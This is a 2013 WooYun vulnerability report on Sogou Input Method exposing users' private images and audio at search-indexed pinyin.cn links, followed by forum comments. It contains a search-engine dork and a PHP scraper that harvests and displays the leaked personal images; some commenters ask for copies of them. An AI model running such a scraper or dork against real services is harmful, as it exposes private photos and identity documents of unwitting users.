当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(42) 关注此漏洞

缺陷编号: WooYun-2013-23081

漏洞标题: 搜狗输入法可导致大量用户敏感信息泄露

相关厂商: 搜狗

漏洞作者: 镇长

提交时间: 2013-05-04 18:21

公开时间: 2013-06-05 16:00

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

2人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-04: 细节已通知厂商并且等待厂商处理中
2013-05-05: 厂商已经确认,细节仅向厂商公开
2013-05-15: 细节向核心白帽子及相关领域专家公开
2013-05-25: 细节向普通白帽子公开
2013-06-04: 细节向实习白帽子公开
2013-06-05: 细节向公众公开

简要描述:

搜狗输入法信息发送过程存储了相对应的信息在云端,但由于相应配置及其他原因造成会话信息【图片、视频、音频】泄露。其中很多身份证、果照、还有检举信!!!

详细说明:

搜狗输入法信息发送过程存储了相对应的信息,由于不严谨造成信息被搜索引擎抓取。

Google或者bing:

输入关键词:site:pinyin.cn

[bing=3,700 条结果],[Google=约 1,120 条结果 ]

1.png



2.png



3.jpg



122.png

漏洞证明:

为了验证方便,写了一段代码这个是针对bing的结果弄的。

直接这种形式去查看吧,挺方便还支持翻页哦亲!

code 区域
<?php


set_time_limit(0);


$url = 'http://cn.bing.com/search?q=site%3apinyin.cn&qs=n&pq=site%3apinyin.cn&sc=0-4&sp=-1&sk=&first={ddddd}1&FORM=PERE';





$i = $_GET['i'];


	$api = file_get_contents(str_replace('{ddddd}',$i,$url));


	preg_match_all('/<a href=\"http:\/\/pinyin.cn\/([a-zA-Z0-9]+)?\"/',$api,$a);


	foreach($a[1] as $v) {


		$api = file_get_contents('http://pinyin.cn/'.$v);


		preg_match('/<a target="_blank" href="(.*?)">/',$api,$aa);


		if($aa) {


			echo '<br>';


			echo '<a target="_blank" href="http://pinyin.cn/'.$v.'">http://pinyin.cn/'.$v.'</a>:';


			echo '<img class=\'round_img\' id=\'round_img\' src="'.$aa[1].'" border=0 max-width="210px" max-height="210px" />';





		}


}

修复方案:

短信发送时可以带一组查看码(如4位字符),打开链接时输入查看码才能查看内容。

版权声明:转载请注明来源 镇长@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2013-05-05 12:20

厂商回复:

收到,感谢反馈

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-05-04 18:33 | blue 认证白帽子 ( 普通白帽子 | Rank:779 漏洞数:68 | 我心中有猛虎,细嗅蔷薇。)
    2

    都泄漏啥了?艳照门?

    1# 回复此人
  2. 2013-05-04 18:49 | liner ( 普通白帽子 | Rank:165 漏洞数:27 )
    8

    楼主准备跑路吧,11年搜狗输入法就带后门了,有类似功能的软件还有好几款

    2# 回复此人
  3. 2013-05-04 18:52 | QQ852451559 ( 实习白帽子 | Rank:79 漏洞数:18 | 学生党)
    2

    哈哈。。黑阔们,你们一直都在天朝的监控之下。

    3# 回复此人
  4. 2013-05-04 18:53 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)
    1

    @liner 真的假的?没事的,我们镇上我最大,谁来杀谁啊!

    4# 回复此人
  5. 2013-05-04 18:56 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)
    4

    @QQ852451559 我不是黑客啊,不说了。我下地干活去了,地里的农药还没打完呢,来发个漏洞就走了。

    5# 回复此人
  6. 2013-05-04 19:50 | ACGT ( 实习白帽子 | Rank:32 漏洞数:4 | another script kiddie)
    0

    楼主自求多福吧,这个功能是跟衙门合作的,不信去zone搜一下

    6# 回复此人
  7. 2013-05-04 21:31 | liner ( 普通白帽子 | Rank:165 漏洞数:27 )
    0

    @镇长 准备跑吧....他们为了这个可是花了力气的...

    7# 回复此人
  8. 2013-05-04 21:46 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:76 | coder)
    1

    面对地对地导弹的精准打击,在田地里伪装成辛勤劳作的农民是没有用的!

    8# 回复此人
  9. 2013-05-04 22:35 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)
    0

    @shine 不要吓唬我啊,我第一次提交漏洞啊。还年轻,前辈们别吓唬我啊!

    9# 回复此人
  10. 2013-05-05 10:20 | 专业种田 认证白帽子 ( 核心白帽子 | Rank:1636 漏洞数:186 | 没有最专业的农民,只有更努力地耕耘..........)
    3

    @镇长 现在打农药都是晚上进行的吗,交流下,我最近也搞科学种田:)

    10# 回复此人
  11. 2013-05-05 10:27 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)
    1

    @专业种田 给害虫吃的,下午正好他们需要进食。

    11# 回复此人
  12. 2013-05-05 12:32 | liner ( 普通白帽子 | Rank:165 漏洞数:27 )
    1

    @镇长 你这搞的人BJ G ||A 又得重新请主管吃饭,程序又得重新设计后门了

    12# 回复此人
  13. 2013-05-05 14:26 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)
    1

    @镇长,目测今晚会有人去你家借拖拉机

    13# 回复此人
  14. 2013-06-05 16:16 | liyang ( 路人 | Rank:25 漏洞数:10 | 低调 沉默 守望)
    1

    要火了~现在竟然还能搜到~

    14# 回复此人
  15. 2013-06-05 16:28 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    我靠,官方一个多月了居然还没修!

    15# 回复此人
  16. 2013-06-05 16:38 | 呆子不开口 ( 普通白帽子 | Rank:370 漏洞数:34 | 求各种兼职)
    0

    @疯狗 从底层就没考虑,估计不好修了

    16# 回复此人
  17. 2013-06-05 16:48 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    @呆子不开口 目前搜狗自残中。。

    17# 回复此人
  18. 2013-06-05 16:48 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:17 | 当我又回首一切,这个世界会好吗?)
    0

    都没有节操

    18# 回复此人
  19. 2013-06-05 16:49 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)
    0

    搜不到了..robot处理了

    19# 回复此人
  20. 2013-06-05 16:49 | 呆子不开口 ( 普通白帽子 | Rank:370 漏洞数:34 | 求各种兼职)
    0

    @疯狗 不可能删除,可能是换地址了,可以抓包再看看

    20# 回复此人
  21. 2013-06-05 17:15 | x-star ( 普通白帽子 | Rank:124 漏洞数:13 | Windows/Linux Kernel. Information Secur...)
    2

    已经看不了了

    21# 回复此人
  22. 2013-06-05 17:18 | rhfs ( 路人 | Rank:8 漏洞数:1 | rhfs.cc)
    3

    已经搜不到了。来晚了。

    22# 回复此人
  23. 2013-06-05 17:58 | xiaogui ( 实习白帽子 | Rank:88 漏洞数:15 | 围观大牛来了~~~)
    0

    来晚了,后悔啊~~~

    23# 回复此人
  24. 2013-06-05 19:39 | 海绵宝宝 ( 普通白帽子 | Rank:369 漏洞数:56 | 唯有梦想与好姑娘不可辜负.)
    0

    来晚了,后悔啊~~~~~

    24# 回复此人
  25. 2013-06-05 19:53 | ayys ( 路人 | Rank:2 漏洞数:2 | 欢迎交流,熟悉正方教务系统漏洞。专业挖洞...)
    0

    来晚了。。。。啊。。。。。。

    25# 回复此人
  26. 2013-06-05 19:58 | niliu 认证白帽子 ( 核心白帽子 | Rank:1719 漏洞数:202 | 逆流而上)
    0

    擦,又晚了

    26# 回复此人
  27. 2013-06-05 20:02 | p0di ( 普通白帽子 | Rank:121 漏洞数:17 | 1+1 = 2 ?)
    0

    哥们自己没少看吧?

    27# 回复此人
  28. 2013-06-05 20:56 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)
    0

    来晚了呀来晚了

    28# 回复此人
  29. 2013-06-05 23:46 | x0ers ( 路人 | Rank:25 漏洞数:4 | 专注计算机:开机关机重启20年。)
    2

    啊啊啊啊啊啊,来晚了,楼主把你打包的发出来吧,好人一身平安,你懂的!

    29# 回复此人
  30. 2013-06-05 23:55 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)
    0

    @p0di 哎,我一个种地的,为什么发个漏洞会引起如此大的效果。弄得我到现在还不敢睡觉,明天一早还要下地干活啊。

    30# 回复此人
  31. 2013-06-05 23:55 | 镇长 ( 路人 | Rank:17 漏洞数:2 | 乌云小镇,镇长!)
    0

    @x0ers 我一个种地的留这些干啥啊。

    31# 回复此人
  32. 2013-06-06 13:09 | 小土豆 ( 普通白帽子 | Rank:129 漏洞数:22 )
    0

    小屌丝 膜拜神牛。

    32# 回复此人
  33. 2013-06-06 14:34 | 唐纳德 ( 路人 | Rank:8 漏洞数:1 | 网站站长)
    1

    其他的搜索引擎可以搜到结果,但是提示文件已过期,和谐掉了吧

    33# 回复此人
  34. 2013-06-06 20:00 | 黄色沙漠 ( 路人 | Rank:11 漏洞数:1 )
    0

    谷歌hack哈

    34# 回复此人
  35. 2013-11-08 11:21 | kid23 ( 路人 | Rank:0 漏洞数:1 | 1+1=10)
    0

    @镇长 噗,是你挑的图片太劲爆

    35# 回复此人

登录后才能发表评论,请先 登录